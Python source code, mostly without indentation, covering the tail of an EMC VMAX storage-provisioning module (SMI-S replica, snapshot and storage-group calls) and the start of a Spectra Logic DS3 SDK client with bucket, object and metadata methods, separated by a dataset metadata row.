self, conn, repServiceInstanceName,
cloneName, syncType, sourceInstance, extraSpecs,
targetInstance=None, rsdInstance=None):
"""Make SMI-S call to create replica for source element.
:param conn: the connection to the ecom server
:param repServiceInstanceName: replication service
:param cloneName: clone volume name
:param syncType: 7=snapshot, 8=clone
:param sourceInstance: source volume instance
:param extraSpecs: additional info
:param targetInstance: Target volume instance. Default None
:param rsdInstance: replication settingdata instance. Default None
:returns: int -- rc - return code
:returns: job - job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
startTime = time.time()
LOG.debug("Create replica: %(clone)s "
"syncType: %(syncType)s Source: %(source)s.",
{'clone': cloneName,
'syncType': syncType,
'source': sourceInstance.path})
storageSystemName = sourceInstance['SystemName']
__, __, sgInstanceName = (
self.utils.get_v3_default_sg_instance_name(
conn, extraSpecs[self.utils.POOL],
extraSpecs[self.utils.SLO],
extraSpecs[self.utils.WORKLOAD], storageSystemName))
try:
storageGroupInstance = conn.GetInstance(sgInstanceName)
except Exception:
exceptionMessage = (_(
"Unable to get the name of the storage group"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
@lockutils.synchronized(storageGroupInstance['ElementName'],
"emc-sg-", True)
def do_create_element_replica():
if targetInstance is None and rsdInstance is None:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(syncType, '16'),
SourceElement=sourceInstance.path,
Collections=[sgInstanceName])
else:
rc, job = self._create_element_replica_extra_params(
conn, repServiceInstanceName, cloneName, syncType,
sourceInstance, targetInstance, rsdInstance,
sgInstanceName)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Create Cloned Volume: %(cloneName)s "
"Return code: %(rc)lu. Error: %(error)s.")
% {'cloneName': cloneName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateElementReplica "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc, job
return do_create_element_replica()
def _create_element_replica_extra_params(
self, conn, repServiceInstanceName, cloneName, syncType,
sourceInstance, targetInstance, rsdInstance, sgInstanceName):
"""CreateElementReplica using extra parameters.
:param conn: the connection to the ecom server
:param repServiceInstanceName: replication service
:param cloneName: clone volume name
:param syncType: 7=snapshot, 8=clone
:param sourceInstance: source volume instance
:param targetInstance: Target volume instance. Default None
:param rsdInstance: replication settingdata instance. Default None
:param sgInstanceName: pool instance name
:returns: int -- rc - return code
:returns: job - job object of the replica creation operation
"""
syncType = self.utils.get_num(syncType, '16')
if targetInstance and rsdInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path,
ReplicationSettingData=rsdInstance)
elif targetInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path)
elif rsdInstance:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=syncType,
SourceElement=sourceInstance.path,
ReplicationSettingData=rsdInstance,
Collections=[sgInstanceName])
return rc, job
def break_replication_relationship(
self, conn, repServiceInstanceName, syncInstanceName,
operation, extraSpecs, force=False):
"""Deletes the relationship between the clone/snap and source volume.
Makes an SMI-S call to break clone relationship between the clone
volume and the source.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param operation: operation code
:param extraSpecs: additional info
:param force: force to break replication relationship if True
:returns: rc - return code
:returns: job - job object of the replica creation operation
"""
LOG.debug("Break replication relationship: %(sv)s "
"operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs, force)
def create_storage_group_v3(self, conn, controllerConfigService,
groupName, srp, slo, workload, extraSpecs):
"""Create the volume in the specified pool.
:param conn: the connection information to the ecom server
:param controllerConfigService: the controller configuration service
:param groupName: the group name (String)
:param srp: the SRP (String)
:param slo: the SLO (String)
:param workload: the workload (String)
:param extraSpecs: additional info
:returns: storageGroupInstanceName - storage group instance name
"""
startTime = time.time()
@lockutils.synchronized(groupName, "emc-sg-", True)
def do_create_storage_group_v3():
if slo and workload:
rc, job = conn.InvokeMethod(
'CreateGroup',
controllerConfigService,
GroupName=groupName,
Type=self.utils.get_num(4, '16'),
EMCSRP=srp,
EMCSLO=slo,
EMCWorkload=workload)
else:
rc, job = conn.InvokeMethod(
'CreateGroup',
controllerConfigService,
GroupName=groupName,
Type=self.utils.get_num(4, '16'))
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(
conn, job, extraSpecs)
if rc != 0:
LOG.error(_LE(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s."),
{'groupName': groupName,
'rc': rc,
'error': errordesc})
                    raise exception.VolumeBackendAPIException(
                        data=errordesc)
LOG.debug("InvokeMethod CreateGroup "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, groupName)
return foundStorageGroupInstanceName
return do_create_storage_group_v3()
def get_storage_pool_capability(self, conn, poolInstanceName):
"""Get the pool capability.
:param conn: the connection information to the ecom server
:param poolInstanceName: the pool instance
:returns: the storage pool capability instance. None if not found
"""
storagePoolCapability = None
associators = (
conn.AssociatorNames(poolInstanceName,
ResultClass='Symm_StoragePoolCapabilities'))
if len(associators) > 0:
storagePoolCapability = associators[0]
return storagePoolCapability
def get_storage_pool_setting(
self, conn, storagePoolCapability, slo, workload):
"""Get the pool setting for pool capability.
:param conn: the connection information to the ecom server
:param storagePoolCapability: the storage pool capability instance
:param slo: the slo string e.g Bronze
:param workload: the workload string e.g DSS_REP
:returns: the storage pool setting instance
"""
foundStoragePoolSetting = None
storagePoolSettings = (
conn.AssociatorNames(storagePoolCapability,
ResultClass='CIM_storageSetting'))
for storagePoolSetting in storagePoolSettings:
settingInstanceID = storagePoolSetting['InstanceID']
matchString = ("%(slo)s:%(workload)s"
% {'slo': slo,
'workload': workload})
if matchString in settingInstanceID:
foundStoragePoolSetting = storagePoolSetting
break
if foundStoragePoolSetting is None:
exceptionMessage = (_(
"The array does not support the storage pool setting "
"for SLO %(slo)s and workload %(workload)s. Please "
"check the array for valid SLOs and workloads.")
% {'slo': slo,
'workload': workload})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return foundStoragePoolSetting
def _get_supported_size_range_for_SLO(
self, conn, storageConfigService,
srpPoolInstanceName, storagePoolSettingInstanceName, extraSpecs):
"""Gets available performance capacity per SLO.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service instance
:param srpPoolInstanceName: the SRP storage pool instance
:param storagePoolSettingInstanceName: the SLO type, e.g Bronze
:param extraSpecs: additional info
:returns: dict -- supportedSizeDict - the supported size dict
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, supportedSizeDict = conn.InvokeMethod(
'GetSupportedSizeRange',
srpPoolInstanceName,
ElementType=self.utils.get_num(3, '16'),
Goal=storagePoolSettingInstanceName)
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(
conn, supportedSizeDict, extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Cannot get supported size range for %(sps)s "
"Return code: %(rc)lu. Error: %(error)s.")
% {'sps': storagePoolSettingInstanceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod GetSupportedSizeRange "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return supportedSizeDict
def get_volume_range(
self, conn, storageConfigService, poolInstanceName, slo, workload,
extraSpecs):
"""Get upper and lower range for volume for slo/workload combination.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage config service
:param poolInstanceName: the pool instance
:param slo: slo string e.g Bronze
:param workload: workload string e.g DSS
:param extraSpecs: additional info
:returns: supportedSizeDict
"""
supportedSizeDict = {}
storagePoolCapabilityInstanceName = self.get_storage_pool_capability(
conn, poolInstanceName)
if storagePoolCapabilityInstanceName:
storagePoolSettingInstanceName = self.get_storage_pool_setting(
conn, storagePoolCapabilityInstanceName, slo, workload)
supportedSizeDict = self._get_supported_size_range_for_SLO(
conn, storageConfigService, poolInstanceName,
storagePoolSettingInstanceName, extraSpecs)
return supportedSizeDict
def activate_snap_relationship(
self, conn, repServiceInstanceName, syncInstanceName, extraSpecs):
"""Activate snap relationship and start copy operation.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param extraSpecs: additional info
:returns: int -- return code
:returns: job object of the replica creation operation
"""
# Operation 4: activate the snapVx.
operation = ACTIVATESNAPVX
LOG.debug("Activate snap: %(sv)s operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs)
def return_to_resource_pool(self, conn, repServiceInstanceName,
syncInstanceName, extraSpecs):
"""Return the snap target resources back to the pool.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
:param extraSpecs: additional info
:returns: rc - return code
:returns: job object of the replica creation operation
"""
        # Operation 19: deactivate the snapVx.
operation = DEACTIVATESNAPVX
LOG.debug("Return snap resource back to pool: "
"%(sv)s operation: %(operation)s.",
{'sv': syncInstanceName, 'operation': operation})
return self._modify_replica_synchronization(
conn, repServiceInstanceName, syncInstanceName, operation,
extraSpecs)
def _modify_replica_synchronization(
self, conn, repServiceInstanceName, syncInstanceName,
operation, extraSpecs, force=False):
"""Modify the relationship between the clone/snap and source volume.
Helper function that makes an SMI-S call to break clone relationship
between the clone volume and the source.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param operation: operation code
:param extraSpecs: additional info
:param force: force to modify replication synchronization if True
:returns: int -- return code
:returns: job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, job = conn.InvokeMethod(
'ModifyReplicaSynchronization', repServiceInstanceName,
Operation=self.utils.get_num(operation, '16'),
Synchronization=syncInstanceName,
Force=force)
LOG.debug("_modify_replica_synchronization: %(sv)s "
"operation: %(operation)s Return code: %(rc)lu.",
{'sv': syncInstanceName, 'operation': operation, 'rc': rc})
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error modify replica synchronization: %(sv)s "
"operation: %(operation)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'sv': syncInstanceName, 'operation': operation,
'rc': rc, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod ModifyReplicaSynchronization "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
return rc, job
def create_group_replica(
self, conn, replicationService,
srcGroupInstanceName, tgtGroupInstanceName, relationName,
extraSpecs):
"""Make SMI-S call to create replica for source group.
:param conn: the connection to the ecom server
:param replicationService: replication service
:param srcGroupInstanceName: source group instance name
:param tgtGroupInstanceName: target group instance name
:param relationName: replica relationship name
:param extraSpecs: additional info
:returns: int -- return code
:returns: job object of the replica creation operation
:raises: VolumeBackendAPIException
"""
LOG.debug(
"Creating CreateGroupReplica V3: "
"replicationService: %(replicationService)s "
"RelationName: %(relationName)s "
"sourceGroup: %(srcGroup)s "
"targetGroup: %(tgtGroup)s.",
{'replicationService': replicationService,
'relationName': relationName,
'srcGroup': srcGroupInstanceName,
'tgtGroup': tgtGroupInstanceName})
rc, job = conn.InvokeMethod(
'CreateGroupReplica',
replicationService,
RelationshipName=relationName,
SourceGroup=srcGroupInstanceName,
TargetGroup=tgtGroupInstanceName,
SyncType=self.utils.get_num(SNAPSYNCTYPE, '16'))
if rc != 0:
rc, errordesc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMsg = (_("Error CreateGroupReplica: "
"source: %(source)s target: %(target)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'source': srcGroupInstanceName,
'target': tgtGroupInstanceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMsg)
raise exception.VolumeBackendAPIException(data=exceptionMsg)
return rc, job
def get_srp_pool_stats(self, conn, arrayInfo):
"""Get the totalManagedSpace, remainingManagedSpace.
:param conn: the connection to the ecom server
:param arrayInfo: the array dict
:returns: totalCapacityGb
:returns: remainingCapacityGb
"""
totalCapacityGb = -1
remainingCapacityGb = -1
storageSystemInstanceName = self.utils.find_storageSystem(
conn, arrayInfo['SerialNumber'])
srpPoolInstanceNames = conn.AssociatorNames(
storageSystemInstanceName,
ResultClass='Symm_SRPStoragePool')
for srpPoolInstanceName in srpPoolInstanceNames:
poolnameStr = self.utils.get_pool_name(conn, srpPoolInstanceName)
if six.text_type(arrayInfo['PoolName']) == (
six.text_type(poolnameStr)):
try:
                    # Check that pool hasn't suddenly been deleted.
srpPoolInstance = conn.GetInstance(srpPoolInstanceName)
propertiesList = srpPoolInstance.properties.items()
for properties in propertiesList:
if properties[0] == 'TotalManagedSpace':
cimProperties = properties[1]
totalManagedSpace = cimProperties.value
totalCapacityGb = self.utils.convert_bits_to_gbs(
totalManagedSpace)
elif properties[0] == 'RemainingManagedSpace':
cimProperties = properties[1]
remainingManagedSpace = cimProperties.value
remainingCapacityGb = (
self.utils.convert_bits_to_gbs(
remainingManagedSpace))
except Exception:
pass
remainingSLOCapacityGb = (
self._get_remaining_slo_capacity_wlp(
conn, srpPoolInstanceName, arrayInfo,
storageSystemInstanceName['Name']))
if remainingSLOCapacityGb != -1:
remainingCapacityGb = remainingSLOCapacityGb
else:
LOG.warning(_LW(
"Remaining capacity %(remainingCapacityGb)s "
"GBs is determined from SRP pool capacity "
"and not the SLO capacity. Performance may "
"not be what you expect."),
{'remainingCapacityGb': remainingCapacityGb})
return totalCapacityGb, remainingCapacityGb
def _get_remaining_slo_capacity_wlp(self, conn, srpPoolInstanceName,
arrayInfo, systemName):
"""Get the remaining SLO capacity.
This is derived from the WLP portion of Unisphere. Please
see the SMIProvider doc and the readme doc for details.
:param conn: the connection to the ecom server
:param srpPoolInstanceName: SRP instance name
:param arrayInfo: the array dict
:param systemName: the system name
:returns: remainingCapacityGb
"""
remainingCapacityGb = -1
storageConfigService = (
self.utils.find_storage_configuration_service(
conn, systemName))
supportedSizeDict = (
self.get_volume_range(
conn, storageConfigService, srpPoolInstanceName,
arrayInfo['SLO'], arrayInfo['Workload'],
None))
try:
# Information source is V3.
if supportedSizeDict['EMCInformationSource'] == INFO_SRC_V3:
remainingCapacityGb = self.utils.convert_bits_to_gbs(
supportedSizeDict['EMCRemainingSLOCapacity'])
LOG.debug("Received remaining SLO Capacity "
"%(remainingCapacityGb)s GBs for SLO "
"%(SLO)s and workload %(workload)s.",
{'remainingCapacityGb': remainingCapacityGb,
'SLO': arrayInfo['SLO'],
'workload': arrayInfo['Workload']})
except KeyError:
pass
return remainingCapacityGb
def extend_volume_in_SG(
self, conn, storageConfigService, volumeInstanceName,
volumeName, volumeSize, extraSpecs):
"""Extend a volume instance.
:param conn: connection to the ecom server
:param storageConfigservice: the storage configuration service
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
:param volumeSize: the volume size
:param extraSpecs: additional info
:returns: volumeDict
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, TheElement=volumeInstanceName,
Size=self.utils.get_num(volumeSize, '64'))
LOG.debug("Extend Volume: %(volumename)s. Return code: %(rc)lu.",
{'volumename': volumeName,
'rc': rc})
if rc != 0:
rc, error_desc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Extend Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': error_desc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateOrModifyElementFromStoragePool "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
# Find the newly created volume.
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
| apache-2.0 | 5,956,583,277,462,807,000 | 41.79786 | 79 | 0.575167 | false |
chanchett/ds3_python_sdk_ | ds3/ds3.py | 1 | 30418 | # Copyright 2014-2015 Spectra Logic Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from ctypes import *
import libds3
def checkExistence(obj, wrapper = lambda ds3Str: ds3Str.contents.value):
if obj:
return wrapper(obj)
else:
return None
def arrayToList(array, length, wrapper = lambda ds3Str: ds3Str.contents.value):
result = []
for i in xrange(0, length):
result.append(wrapper(array[i]))
return result
class Ds3Error(Exception):
def __init__(self, libds3Error):
self.reason = libds3Error.contents.message.contents.value
response = libds3Error.contents.error
self._hasResponse = False
self.statusCode = None
self.statusMessage = None
self.message = None
if response:
self._hasResponse = True
self.statusCode = response.contents.status_code
self.statusMessage = response.contents.status_message.contents.value
self.message = checkExistence(response.contents.error_body)
libds3.lib.ds3_free_error(libds3Error)
def __str__(self):
errorMessage = "Reason: " + self.reason
if self._hasResponse:
errorMessage += " | StatusCode: " + str(self.statusCode)
errorMessage += " | StatusMessage: " + self.statusMessage
if self.message:
errorMessage += " | Message: " + self.message
return errorMessage
def __repr__(self):
return self.__str__()
class Credentials(object):
def __init__(self, accessKey, secretKey):
self.accessKey = accessKey
self.secretKey = secretKey
class Ds3Bucket(object):
def __init__(self, ds3Bucket):
self.name = ds3Bucket.name.contents.value
self.creationDate = ds3Bucket.creation_date.contents.value
def __str__(self):
return "Name: " + self.name + " | Creation Date: " + self.creationDate
def __repr__(self):
return self.__str__()
class Ds3Owner(object):
def __init__(self, ds3Owner):
ownerContents = ds3Owner.contents
self.name = ownerContents.name.contents.value
self.id = ownerContents.id.contents.value
def __str__(self):
return "Name: " + self.name + " | ID: " + self.id
def __repr__(self):
return self.__str__()
class Ds3Object(object):
def __init__(self, ds3Object):
self.name = ds3Object.name.contents.value
self.etag = checkExistence(ds3Object.etag)
self.size = ds3Object.size
self.owner = Ds3Owner(ds3Object.owner)
def __str__(self):
return "Name: " + self.name + " | Size: " + str(self.size) + " | Etag: " + str(self.etag) + " | Owner: " + str(self.owner)
def __repr__(self):
return self.__str__()
class Ds3BucketDetails(object):
def __init__(self, ds3Bucket):
bucketContents = ds3Bucket.contents
self.name = bucketContents.name.contents.value
self.creationDate = checkExistence(bucketContents.creation_date)
self.isTruncated = bool(bucketContents.is_truncated)
self.marker = checkExistence(bucketContents.marker)
self.delimiter = checkExistence(bucketContents.delimiter)
self.maxKeys = bucketContents.max_keys
self.nextMarker = checkExistence(bucketContents.next_marker)
self.prefix = checkExistence(bucketContents.prefix)
self.commonPrefixes = arrayToList(bucketContents.common_prefixes, bucketContents.num_common_prefixes)
self.objects = arrayToList(bucketContents.objects, bucketContents.num_objects, wrapper = Ds3Object)
class Ds3BulkObject(object):
def __init__(self, bulkObject):
self.name = bulkObject.name.contents.value
self.length = bulkObject.length
self.offset = bulkObject.offset
self.inCache = bool(bulkObject.in_cache)
def __str__(self):
return "Name:" + self.name + " | Length: " + str(self.length) + " | Offset: " + str(self.offset) + " | InCache: " + str(self.inCache)
def __repr__(self):
return self.__str__()
class Ds3CacheList(object):
def __init__(self, bulkObjectList):
contents = bulkObjectList.contents
self.chunkNumber = contents.chunk_number
self.nodeId = checkExistence(contents.node_id)
self.serverId = checkExistence(contents.server_id)
self.chunkId = contents.chunk_id.contents.value
self.objects = arrayToList(contents.list, contents.size, wrapper = Ds3BulkObject)
class Ds3BulkPlan(object):
def __init__(self, ds3BulkResponse):
contents = ds3BulkResponse.contents
self.bucketName = checkExistence(contents.bucket_name)
if contents.cached_size_in_bytes:
self.cachedSize = contents.cached_size_in_bytes
if contents.completed_size_in_bytes:
            self.completedSize = contents.completed_size_in_bytes
self.jobId = checkExistence(contents.job_id)
if contents.original_size_in_bytes:
self.originalSize = contents.original_size_in_bytes
self.startDate = checkExistence(contents.start_date)
self.userId = checkExistence(contents.user_id)
self.userName = checkExistence(contents.user_name)
self.requestType = contents.request_type
self.status = contents.status
self.chunks = arrayToList(contents.list, contents.list_size, wrapper = Ds3CacheList)
def __str__(self):
response = "JobId: " + self.jobId
response += " | Status: " + str(self.status)
response += " | Request Type: " + str(self.requestType)
response += " | BucketName: " + self.bucketName
response += " | UserName: " + self.userName
response += " | Chunks: " + str(self.chunks)
return response
def __repr__(self):
return self.__str__()
class Ds3AllocateChunkResponse(object):
def __init__(self, ds3AllocateChunkResponse):
contents = ds3AllocateChunkResponse.contents
self.retryAfter = contents.retry_after
self.chunk = Ds3CacheList(contents.objects)
class Ds3AvailableChunksResponse(object):
def __init__(self, ds3AvailableChunksResponse):
contents = ds3AvailableChunksResponse.contents
self.retryAfter = contents.retry_after
self.bulkPlan = Ds3BulkPlan(contents.object_list)
class Ds3SearchObject(object):
def __init__(self, ds3SearchObject):
contents = ds3SearchObject.contents
self.bucketId = checkExistence(contents.bucket_id)
self.id = checkExistence(contents.id)
self.name = checkExistence(contents.name)
self.size = contents.size
self.owner = checkExistence(contents.owner, wrapper = Ds3Owner)
self.lastModified = checkExistence(contents.last_modified)
self.storageClass = checkExistence(contents.storage_class)
self.type = checkExistence(contents.type)
self.version = checkExistence(contents.version)
def __str__(self):
response = "BucketId: " + str(self.bucketId)
response += " | Id: " + str(self.id)
response += " | Name: " + str(self.name)
response += " | Size: " + str(self.size)
response += " | Owner: (" + str(self.id) + ")"
response += " | LastModified: " + str(self.lastModified)
response += " | StorageClass: " + str(self.storageClass)
response += " | Type: " + str(self.type)
response += " | Version: " + str(self.version)
return response
class Ds3BuildInformation(object):
def __init__(self, ds3BuildInfo):
contents = ds3BuildInfo.contents
self.branch = checkExistence(contents.branch)
self.revision = checkExistence(contents.revision)
self.version = checkExistence(contents.version)
def __str__(self):
response = "Branch: " + str(self.branch)
response += " | Revision: " + str(self.revision)
response += " | Version: " + str(self.version)
return response
class Ds3SystemInformation(object):
def __init__(self, ds3SystemInfo):
contents = ds3SystemInfo.contents
self.apiVersion = checkExistence(contents.api_version)
self.serialNumber = checkExistence(contents.serial_number)
self.buildInformation = checkExistence(contents.build_information, wrapper = Ds3BuildInformation)
def __str__(self):
response = "API Version: " + str(self.apiVersion)
response += " | Serial Number: " + str(self.serialNumber)
response += " | Build Information: " + str(self.buildInformation)
return response
class Ds3SystemHealthInformation(object):
def __init__(self, ds3HealthInfo):
contents = ds3HealthInfo.contents
self.msRequiredToVerifyDataPlannerHealth = contents.ms_required_to_verify_data_planner_health
def typeCheck(input_arg, type_to_check):
if isinstance(input_arg, type_to_check):
return input_arg
else:
raise TypeError("expected instance of type " + type_to_check.__name__ + ", got instance of type " + type(input_arg).__name__)
def typeCheckString(input_arg):
return typeCheck(input_arg, basestring)
def enumCheck(input_arg, enum_dict):
if input_arg in enum_dict.keys():
return enum_dict[input_arg]
else:
raise TypeError("expected value to be one of " + str(enum_dict.keys()) + ", got " + str(input_arg))
def enumCheckDs3ObjectType(input_arg):
return enumCheck(input_arg, {"DATA":0, "FOLDER":1})
def addMetadataToRequest(request, metadata):
if metadata:
for key in metadata:
if type(metadata[key]) is list or type(metadata[key]) is tuple:
for value in metadata[key]:
libds3.lib.ds3_request_set_metadata(request, key, value);
else:
libds3.lib.ds3_request_set_metadata(request, key, metadata[key]);
def extractMetadataFromResponse(metaData):
result = {}
keys = libds3.lib.ds3_metadata_keys(metaData)
if keys:
for key_index in xrange(0, keys.contents.num_keys):
key = keys.contents.keys[key_index].contents.value
metadataEntry = libds3.lib.ds3_metadata_get_entry(metaData, key)
result[key] = arrayToList(metadataEntry.contents.values, metadataEntry.contents.num_values)
libds3.lib.ds3_free_metadata_entry(metadataEntry)
libds3.lib.ds3_free_metadata_keys(keys)
return result
def createClientFromEnv():
libDs3Client = POINTER(libds3.LibDs3Client)()
error = libds3.lib.ds3_create_client_from_env(byref(libDs3Client))
if error:
raise Ds3Error(error)
clientContents = libDs3Client.contents
clientCreds = clientContents.creds.contents
creds = Credentials(clientCreds.access_id.contents.value, clientCreds.secret_key.contents.value)
proxyValue = checkExistence(clientContents.proxy)
client = Ds3Client(clientContents.endpoint.contents.value, creds, proxyValue)
libds3.lib.ds3_free_creds(clientContents.creds)
libds3.lib.ds3_free_client(libDs3Client)
return client
class Ds3Client(object):
'''
This object is used to communicate with a remote DS3/Spectra S3 endpoint. All communication with the Spectra S3 API is done with this class.
'''
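    # Illustrative construction (sketch; endpoint and keys are placeholders):
    #   client = Ds3Client("http://ds3.example.com:8080",
    #                      Credentials("access_id", "secret_key"))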
def __init__(self, endpoint, credentials, proxy = None):
self._ds3Creds = libds3.lib.ds3_create_creds(c_char_p(credentials.accessKey), c_char_p(credentials.secretKey))
self._client = libds3.lib.ds3_create_client(c_char_p(endpoint), self._ds3Creds)
self.credentials = credentials
def verifySystemHealth(self):
'''
Returns how long it took to verify the health of the system. In the event that the system is in a bad state, an error will
be thrown.
'''
response = POINTER(libds3.LibDs3VerifySystemHealthResponse)()
request = libds3.lib.ds3_init_verify_system_health()
error = libds3.lib.ds3_verify_system_health(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemHealthInformation(response)
libds3.lib.ds3_free_verify_system_health(response)
return result
def getService(self):
'''
Returns a list of all the buckets the current access id has access to.
'''
response = POINTER(libds3.LibDs3GetServiceResponse)()
request = libds3.lib.ds3_init_get_service()
error = libds3.lib.ds3_get_service(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
contents = response.contents
for i in xrange(0, response.contents.num_buckets):
yield Ds3Bucket(contents.buckets[i])
libds3.lib.ds3_free_service_response(response)
def getBucket(self, bucketName, prefix = None, nextMarker = None, delimiter = None, maxKeys = None):
'''
Returns a list of all the objects in a specific bucket as specified by `bucketName`. This will return at most 1000 objects.
In order to retrieve more, pagination must be used. The `nextMarker` is used to specify where the next 1000 objects will
start listing from.
`delimiter` can be used to list objects like directories. So for example, if delimiter is set to '/' then it will return
a list of 'directories' in the commons prefixes field in the response. In order to list all the files in that directory use the prefix parameter.
For example:
client.getBucket("my_bucket", prefix = 'dir', delimiter = '/')
The above will list any files and directories that are in the 'dir' directory.
'''
response = POINTER(libds3.LibDs3GetBucketResponse)()
request = libds3.lib.ds3_init_get_bucket(typeCheckString(bucketName))
if prefix:
libds3.lib.ds3_request_set_prefix(request, typeCheckString(prefix))
if nextMarker:
libds3.lib.ds3_request_set_marker(request, nextMarker)
if delimiter:
libds3.lib.ds3_request_set_delimiter(request, typeCheckString(delimiter))
if maxKeys:
libds3.lib.ds3_request_set_max_keys(request, maxKeys)
error = libds3.lib.ds3_get_bucket(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bucket = Ds3BucketDetails(response)
libds3.lib.ds3_free_bucket_response(response)
return bucket
def headObject(self, bucketName, objectName):
'''
Returns the metadata for the retrieved object as a dictionary of lists. If the object does not exist
an error is thrown with a status code of 404.
'''
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_head_object(typeCheckString(bucketName), typeCheckString(objectName))
error = libds3.lib.ds3_head_object(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def headBucket(self, bucketName):
'''
Checks whether a bucket exists.
'''
request = libds3.lib.ds3_init_head_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_head_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteFolder(self, bucketName, folderName):
'''
Deletes a folder and all the objects contained within it.
'''
request = libds3.lib.ds3_init_delete_folder(typeCheckString(bucketName), typeCheckString(folderName))
error = libds3.lib.ds3_delete_folder(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getSystemInformation(self):
'''
Returns the version and other information about the Spectra S3 endpoint.
'''
response = POINTER(libds3.LibDs3GetSystemInformationResponse)()
request = libds3.lib.ds3_init_get_system_information()
error = libds3.lib.ds3_get_system_information(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemInformation(response)
libds3.lib.ds3_free_get_system_information(response)
return result
def getObject(self, bucketName, objectName, offset, jobId, realFileName = None):
'''
Gets an object from the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are getting from Spectra S3 does not match what will be on the local filesystem.
Returns the metadata for the retrieved object as a dictionary, where keys are
associated with a list of the values for that key.
This can only be used within the context of a Bulk Get Job.
'''
